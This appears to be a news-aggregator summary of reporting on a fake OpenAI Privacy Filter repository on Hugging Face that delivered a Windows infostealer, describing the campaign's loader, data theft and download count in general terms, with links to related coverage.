Fake OpenAI Privacy Filter Repo Delivers Windows Infostealer on Hugging Face

May 11, 2026 at 10:53 AM

•

1 min read

Fake OpenAI Privacy Filter Repo Delivers Windows Infostealer on Hugging Face — Photo: The Hacker News

TL;DR Summary

A clone of OpenAI's Privacy Filter on Hugging Face impersonated the legitimate model to distribute a Windows infostealer via a loader that downloads payloads through Base64, JSON Keeper, and PowerShell, then sets up a one-shot scheduled task to run the final malware and exfiltrate data (screenshots, crypto wallets, browser data) to a remote domain while attempting to evade detection by disabling AMSI/ETW; the repo peaked at #1 with about 244,000 downloads before being disabled, and researchers link it to similar loaders and ValleyRAT-related campaigns targeting open-source ecosystems.

Topics:technology #huggingface #infostealer #malware #privacy-filter #security #supply-chain-security

Share this article

Fake OpenAI Privacy Filter Repo Hits #1 on Hugging Face, Draws 244K Downloads The Hacker News
Supply Chain Attack: Fake OpenAI Repository on Hugging Face Distributes Infostealer Malware Targeting Developers and AI Tools Rescana
Fake OpenAI Hugging Face OpenAI Repo Pushed Infostealer Malware WinBuzzer
Fake OpenAI repository on Hugging Face pushes infostealer malware BleepingComputer
A fake privacy model on Hugging Face exposed the open model supply chain’s blind spot Startup Fortune

Reading Insights

Total Reads

Unique Readers

Time Saved

3 min

vs 4 min read

Condensed

88%

734 → 87 words

Want the full story? Read the original article

Read on The Hacker News

JavaScript Required

tl;dr daily news requires JavaScript to be enabled. Please enable JavaScript in your browser settings.

Related Sources

Reading Insights